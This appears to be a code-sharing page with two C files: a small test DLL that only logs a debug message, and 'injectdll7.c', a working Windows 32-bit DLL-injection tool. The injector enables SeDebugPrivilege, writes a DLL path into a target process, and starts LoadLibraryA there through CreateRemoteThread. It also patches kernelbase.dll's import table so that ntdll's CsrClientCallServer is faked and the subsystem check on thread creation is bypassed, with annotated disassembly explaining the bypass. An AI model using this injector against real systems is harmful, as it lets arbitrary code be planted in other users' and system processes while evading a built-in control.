[文件] dll.c ~ 382B
01 | #include <windows.h> |
02 | |
03 | |
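/*
 * DllMain - entry point of the payload DLL that injectdll7.c loads into a
 * target process through a remote LoadLibraryA thread.
 *
 * On DLL_PROCESS_ATTACH it emits "[*] DLL injected into process <pid>" via
 * OutputDebugString so the injection can be observed from a debugger or a
 * debug-output viewer. All other reason codes are ignored. The commented-out
 * "int 3" is kept as an optional breakpoint for stepping into the DLL.
 *
 * Returns TRUE unconditionally, so the loader never rejects the DLL because
 * of this function.
 */
BOOL APIENTRY DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)
{
    CHAR Buff[256];

    UNREFERENCED_PARAMETER(hInstance);
    UNREFERENCED_PARAMETER(lpReserved);

    switch (dwReason)
    {
    case DLL_PROCESS_ATTACH:
        /* _snprintf does not NUL-terminate when it truncates; the -1 keeps the
         * last byte free and the explicit store below guarantees termination. */
        _snprintf(Buff, sizeof(Buff) - 1, "[*] DLL injected into process %u\n", GetCurrentProcessId());
        Buff[sizeof(Buff) - 1] = '\0';
        OutputDebugString(Buff);
        //__asm int 3
        break;

    default:
        break;
    }
    return TRUE;
}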
[文件] injectdll7.c ~ 7KB
001 | #define WIN32_LEAN_AND_MEAN |
002 | #include <windows.h> |
003 | #include <strsafe.h> |
004 | #include <stdio.h> |
005 | #include <stdlib.h> |
006 | |
007 | #pragma comment (lib, "advapi32.lib") |
008 | |
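/*
 * GetDebugPrivilege - enable SeDebugPrivilege in the current process token.
 *
 * SeDebugPrivilege lets OpenProcess() succeed against processes owned by other
 * users or the system, which InjectDll() needs for arbitrary targets. The
 * privilege must already be present (disabled) in the token - typically an
 * elevated administrator token; AdjustTokenPrivileges cannot add it.
 *
 * Returns 1 on success, 0 on failure (the failing step is printed).
 *
 * Two pitfalls handled here: AdjustTokenPrivileges returns TRUE even when the
 * privilege was not granted (signalled only through ERROR_NOT_ALL_ASSIGNED),
 * and the token handle must not be closed when OpenProcessToken failed.
 */
DWORD GetDebugPrivilege(void)
{
    HANDLE hToken = NULL;
    DWORD Ret = 1;
    TOKEN_PRIVILEGES TP;

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
    {
        printf("[-] Error in GetDebugPrivilege OpenProcessToken: %u\n", GetLastError());
        Ret = 0;
        goto bye;
    }

    if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &TP.Privileges[0].Luid))
    {
        printf("[-] Error in GetDebugPrivilege LookupPrivilegeValue: %u\n", GetLastError());
        Ret = 0;
        goto bye;
    }

    TP.PrivilegeCount = 1;
    TP.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    if (!AdjustTokenPrivileges(hToken, FALSE, &TP, 0, NULL, NULL))
    {
        printf("[-] Error in GetDebugPrivilege with AdjustTokenPrivileges: %u\n", GetLastError());
        Ret = 0;
        goto bye;
    }

    /* A TRUE return does not mean the privilege is enabled: when the token does
     * not hold it the call "succeeds" and sets ERROR_NOT_ALL_ASSIGNED. */
    if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
    {
        printf("[-] Error in GetDebugPrivilege: SeDebugPrivilege is not held by this token (run elevated)\n");
        Ret = 0;
        goto bye;
    }

bye:
    /* hToken is only valid once OpenProcessToken succeeded. */
    if (hToken != NULL)
        CloseHandle(hToken);

    return Ret;
}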
050 | |
051 | |
/*
 * kernelbase.dll, CreateRemoteThread path, 32-bit (the file name suggests
 * Windows 7). The subsystem is notified through ntdll!CsrClientCallServer;
 * the message passed as first argument starts at [EBP-210] and the status
 * field the caller inspects is at [EBP-1F0], i.e. at offset
 * 0x210 - 0x1F0 = 0x20 inside the message. That value is compared (signed)
 * against EBX and JL jumps away, presumably to the failure path.
 * MyCsrClientCallServer below skips the server call and zeroes that DWORD
 * so the check passes. Pushed arguments, right to left: 0xC, 0x10001, EBX,
 * EAX (the message).
 *
 * 7597BD24 6A 0C             PUSH 0C
 * 7597BD26 68 01000100       PUSH 10001
 * 7597BD2B 53                PUSH EBX
 * 7597BD2C 8D85 F0FDFFFF     LEA EAX, DWORD PTR SS:[EBP-210]
 * 7597BD32 50                PUSH EAX
 * 7597BD33 FF15 00129775     CALL NEAR DWORD PTR DS:[<&ntdll.CsrClientCallServer>] ; ntdll.CsrClientCallServer
 * 7597BD39 8B85 10FEFFFF     MOV EAX, DWORD PTR SS:[EBP-1F0]
 * 7597BD3F 8985 E8FDFFFF     MOV DWORD PTR SS:[EBP-218], EAX
 * 7597BD45 399D E8FDFFFF     CMP DWORD PTR SS:[EBP-218], EBX
 * 7597BD4B 0F8C 13D80100     JL KERNELBA.75999564
 */
065 | |
/* Byte offset, inside the CSR message passed as Arg1, of the status DWORD that
 * kernelbase.dll tests right after the call (disassembly above: message at
 * [EBP-210], tested field at [EBP-1F0], so 0x210 - 0x1F0 = 0x20). */
#define CSR_MSG_STATUS_OFFSET 0x20

/*
 * MyCsrClientCallServer - stand-in for ntdll!CsrClientCallServer.
 *
 * Installed temporarily in kernelbase.dll's IAT by MyCreateRemoteThread. It
 * never contacts CSRSS: it stores 0 (STATUS_SUCCESS) into the message's status
 * field so the caller's signed comparison passes, and returns 0 itself.
 * Arg2..Arg4 are ignored (at the call site above Arg3 is 0x10001 and Arg4 is
 * 0xC). The __stdcall convention with four 32-bit arguments matches the x86
 * call site; this is not valid for an x64 build.
 */
DWORD __stdcall MyCsrClientCallServer(PVOID Arg1, PVOID Arg2, DWORD Arg3, DWORD Arg4)
{
    PDWORD Status = (PDWORD)((PBYTE)Arg1 + CSR_MSG_STATUS_OFFSET);

    UNREFERENCED_PARAMETER(Arg2);
    UNREFERENCED_PARAMETER(Arg3);
    UNREFERENCED_PARAMETER(Arg4);

    *Status = 0;
    return 0;
}
071 | |
072 | |
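/*
 * ScanIatForImportAddress - locate the IAT slot of a named import in a loaded module.
 *
 * Walks the module's import directory (IMAGE_DIRECTORY_ENTRY_IMPORT): for each
 * import descriptor the name table (OriginalFirstThunk) is scanned and, when an
 * entry's name matches Import (case-insensitively), the address of the parallel
 * entry in the address table (FirstThunk) is returned. That slot holds the
 * pointer the loader resolved, so overwriting it redirects every call the
 * module makes through that import.
 *
 * hModule: module base (HMODULE) as returned by GetModuleHandle; NULL -> 0.
 * Import:  exported function name to look for; NULL -> 0.
 *
 * Returns the address of the IAT entry as a DWORD, or 0 when the headers are
 * not a valid PE image, the module has no import table, or the name is not
 * found. Storing a pointer in a DWORD makes this (like the rest of the file)
 * 32-bit only.
 *
 * Ordinal-only imports carry no name and are skipped; treating their ordinal
 * value (high bit set) as an RVA would read far outside the image.
 */
DWORD ScanIatForImportAddress(HANDLE hModule, PCHAR Import)
{
    PIMAGE_DOS_HEADER DosHeader;
    PIMAGE_NT_HEADERS NtHeader;
    PIMAGE_DATA_DIRECTORY ImportDir;
    PIMAGE_IMPORT_DESCRIPTOR ImportDescriptor;
    PIMAGE_THUNK_DATA OriginalThunk;
    PDWORD FirstThunk;
    PIMAGE_IMPORT_BY_NAME ImportByName;
    DWORD i;

    if (hModule == NULL || Import == NULL)
        return 0;

    DosHeader = (PIMAGE_DOS_HEADER)hModule;
    if (DosHeader->e_magic != IMAGE_DOS_SIGNATURE)
        return 0;

    NtHeader = (PIMAGE_NT_HEADERS)((PBYTE)hModule + DosHeader->e_lfanew);
    if (NtHeader->Signature != IMAGE_NT_SIGNATURE)
        return 0;

    /* An empty directory has RVA 0; base + 0 would alias the DOS header. */
    ImportDir = &NtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
    if (ImportDir->VirtualAddress == 0 || ImportDir->Size == 0)
        return 0;

    ImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)((PBYTE)hModule + ImportDir->VirtualAddress);

    /* The descriptor array ends with an all-zero entry. */
    for (; ImportDescriptor->Name != 0; ImportDescriptor++)
    {
        /* Without a name table there is nothing to match against. */
        if (ImportDescriptor->OriginalFirstThunk == 0)
            continue;

        OriginalThunk = (PIMAGE_THUNK_DATA)((PBYTE)hModule + ImportDescriptor->OriginalFirstThunk);
        FirstThunk = (PDWORD)((PBYTE)hModule + ImportDescriptor->FirstThunk);

        for (i = 0; OriginalThunk[i].u1.AddressOfData != 0; i++)
        {
            if (IMAGE_SNAP_BY_ORDINAL(OriginalThunk[i].u1.Ordinal))
                continue;

            ImportByName = (PIMAGE_IMPORT_BY_NAME)((PBYTE)hModule + OriginalThunk[i].u1.AddressOfData);
            if (_stricmp((PCHAR)ImportByName->Name, Import) == 0)
                return (DWORD)&FirstThunk[i];
        }
    }

    return 0;
}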
114 | |
115 | |
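/*
 * MyCreateRemoteThread - CreateRemoteThread wrapper that suppresses the CSRSS
 * thread-creation check in kernelbase.dll.
 *
 * kernelbase!CreateRemoteThread reports the new thread to the Win32 subsystem
 * through ntdll!CsrClientCallServer and fails when the returned status is
 * negative (see the disassembly above). For the duration of the call this
 * function redirects kernelbase.dll's IAT slot for CsrClientCallServer to
 * MyCsrClientCallServer, which reports success without contacting CSRSS, then
 * restores the slot and the page protection.
 *
 * The hook is process-wide: any other thread of this process that enters a
 * kernelbase API using CsrClientCallServer during the window is also
 * short-circuited, so do not run this concurrently with other work. The
 * function pointer is stored through a DWORD, so this is 32-bit only.
 *
 * Parameters and return value are those of CreateRemoteThread. NULL is
 * returned on failure with the reason printed; when CreateRemoteThread itself
 * failed, its GetLastError() value is preserved for the caller.
 */
HANDLE WINAPI MyCreateRemoteThread(
    __in HANDLE hProcess,
    __in LPSECURITY_ATTRIBUTES lpThreadAttributes,
    __in SIZE_T dwStackSize,
    __in LPTHREAD_START_ROUTINE lpStartAddress,
    __in LPVOID lpParameter,
    __in DWORD dwCreationFlags,
    __out LPDWORD lpThreadId
    )
{
    HANDLE hThread;
    DWORD ImportAddress, OriginalCsrClientCallServer, OldProtect, Dummy, LastError;

    ImportAddress = ScanIatForImportAddress(GetModuleHandle("kernelbase.dll"), "CsrClientCallServer");
    if (ImportAddress == 0)
    {
        printf("[-] Error in MyCreateRemoteThread with ScanIatForThunk : Cannot find thunk address\n");
        return NULL;
    }
    printf("[*] CsrClientCallServer import address at : 0x%x\n", ImportAddress);

    /* The IAT is normally read-only; writing without a successful protection
     * change would fault. Execute permission is kept so a page shared with code
     * stays executable for other threads during the window. */
    if (!VirtualProtect((PVOID)ImportAddress, sizeof(DWORD), PAGE_EXECUTE_READWRITE, &OldProtect))
    {
        printf("[-] Error in MyCreateRemoteThread with VirtualProtect : %u\n", GetLastError());
        return NULL;
    }

    OriginalCsrClientCallServer = *(PDWORD)ImportAddress;
    *(PDWORD)ImportAddress = (DWORD)MyCsrClientCallServer;

    hThread = CreateRemoteThread(hProcess, lpThreadAttributes, dwStackSize, lpStartAddress, lpParameter, dwCreationFlags, lpThreadId);
    LastError = GetLastError();

    /* Always unhook, also on failure: a slot left redirected silently breaks
     * every later CSRSS-backed call this process makes. */
    *(PDWORD)ImportAddress = OriginalCsrClientCallServer;
    VirtualProtect((PVOID)ImportAddress, sizeof(DWORD), OldProtect, &Dummy);

    if (hThread == NULL)
    {
        printf("[-] Error in MyCreateRemoteThread with CreateRemoteThread : %u\n", LastError);
        SetLastError(LastError);
        return NULL;
    }

    return hThread;
}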
152 | |
153 | |
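/*
 * InjectDll - load DllName into process Pid with a remote LoadLibraryA thread.
 *
 * Steps: resolve DllName to a full path (a relative name is resolved against
 * the current directory; an absolute path is accepted as-is), enable
 * SeDebugPrivilege, open the target with the rights the remote-thread calls
 * need, copy the path into the target, run LoadLibraryA there through
 * MyCreateRemoteThread (CSRSS bypass), wait for it, and release the remote
 * buffer.
 *
 * Pid:     target process id.
 * DllName: DLL file name or path (ANSI build assumed). It is passed to
 *          LoadLibraryA inside the target, so the target must be able to read
 *          that path.
 *
 * Returns TRUE only when the remote LoadLibraryA returned a non-NULL module
 * handle (read back with GetExitCodeThread; the exit code holds the full
 * HMODULE because this is a 32-bit build). FALSE otherwise, with the failing
 * step printed. The process and thread handles and the remote allocation are
 * released on every path.
 *
 * The wait is unbounded: if LoadLibraryA blocks inside the target (e.g. its
 * DllMain waits on a lock), this call blocks with it.
 */
BOOLEAN InjectDll(DWORD Pid, LPTSTR DllName)
{
    DWORD ThreadID;
    HANDLE hThread = NULL;
    HANDLE hProcess = NULL;
    DWORD InjectSize, PathLen, ExitCode;
    LPVOID Arg = NULL;
    LPTHREAD_START_ROUTINE Injector;
    CHAR FullDllPath[MAX_PATH];
    BOOLEAN Ok = FALSE;

    /* GetFullPathNameA returns 0 on error and the required size when the buffer
     * is too small; both are rejected so a truncated path never reaches the
     * target. */
    PathLen = GetFullPathNameA(DllName, sizeof(FullDllPath), FullDllPath, NULL);
    if (PathLen == 0 || PathLen >= sizeof(FullDllPath))
    {
        printf("[-] Error in InjectDll with GetFullPathName : %u\n", GetLastError());
        return FALSE;
    }

    printf("[*] FullDllPath : %s\n", FullDllPath);

    if (!GetDebugPrivilege())
    {
        printf("[-] Error in InjectDll with GetDebugPrivilege : Cannot grant SeDebugPrivilege\n");
        return FALSE;
    }

    /* The rights VirtualAllocEx/WriteProcessMemory/CreateRemoteThread require. */
    hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION, FALSE, Pid);
    if (hProcess == NULL)
    {
        printf("[-] Error in InjectDll with OpenProcess : %u\n", GetLastError());
        return FALSE;
    }

    InjectSize = PathLen + 1;   /* include the terminator LoadLibraryA expects */

    Arg = VirtualAllocEx(hProcess, NULL, InjectSize, MEM_COMMIT, PAGE_READWRITE);
    if (Arg == NULL)
    {
        printf("[-] Error in InjectDll with VirtualAllocEx : %u\n", GetLastError());
        goto cleanup;
    }

    if (!WriteProcessMemory(hProcess, Arg, FullDllPath, InjectSize, NULL))
    {
        printf("[-] Error in InjectDll with WriteProcessMemory : %u\n", GetLastError());
        goto cleanup;
    }

    /* The local LoadLibraryA address is used as the remote start routine; this
     * relies on kernel32 being mapped at the same base in the target (not
     * verified here). */
    Injector = (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
    if (Injector == NULL)
    {
        printf("[-] Error in InjectDll with GetProcAddress : %u\n", GetLastError());
        goto cleanup;
    }

    hThread = MyCreateRemoteThread(hProcess, NULL, 0, Injector, Arg, 0, &ThreadID);
    if (hThread == NULL)
    {
        printf("[-] Error in InjectDll with MyCreateRemoteThread : %u\n", GetLastError());
        goto cleanup;
    }

    if (WaitForSingleObject(hThread, INFINITE) == WAIT_FAILED)
    {
        printf("[-] Error in InjectDll with WaitForSingleObject : %u\n", GetLastError());
        goto cleanup;
    }

    /* The thread exit code is LoadLibraryA's return value: 0 means the target
     * could not load the DLL (bad path, missing dependency, DllMain failure). */
    if (!GetExitCodeThread(hThread, &ExitCode))
    {
        printf("[-] Error in InjectDll with GetExitCodeThread : %u\n", GetLastError());
        goto cleanup;
    }
    if (ExitCode == 0)
    {
        printf("[-] Error in InjectDll : LoadLibraryA failed in the target process\n");
        goto cleanup;
    }

    Ok = TRUE;

cleanup:
    /* MEM_RELEASE frees the region; MEM_DECOMMIT would leave it reserved. */
    if (Arg != NULL && !VirtualFreeEx(hProcess, Arg, 0, MEM_RELEASE))
    {
        printf("[-] Error in InjectDll with VirtualFreeEx : %u\n", GetLastError());
        Ok = FALSE;
    }
    if (hThread != NULL)
        CloseHandle(hThread);
    CloseHandle(hProcess);

    return Ok;
}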
233 | |
234 | |
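/*
 * main - command-line front end: injectdll7 <pid> <dll name>.
 *
 * Parses the pid as an unsigned decimal number, refuses pid 0 and pid 4
 * (System) and any argument that is not purely numeric, then calls InjectDll.
 * The exit status reflects the outcome (0 on success, 1 on any failure) so the
 * tool can be scripted; the success message is only printed when InjectDll
 * reported success.
 */
int __cdecl main(int argc, char *argv[])
{
    DWORD Pid;
    char *End;

    printf("Custom CreateRemoteThread() which bypass subsystem control\nBy Ivanlef0u\nBE M4D !\n\n");

    if (argc < 3)
    {
        /* The %s needs the program name as argument. */
        printf("Usage is : %s <pid> <dll name>\n", argv[0]);
        return 1;
    }

    Pid = strtoul(argv[1], &End, 10);
    if (End == argv[1] || *End != '\0' || Pid == 0 || Pid == 4)
    {
        printf("[-] Invalid pid : %s\n", argv[1]);
        return 1;
    }

    if (!InjectDll(Pid, argv[2]))
    {
        printf("[-] Dll injection failed\n");
        return 1;
    }

    printf("[+] Dll successfully injected !\n");

    return 0;
}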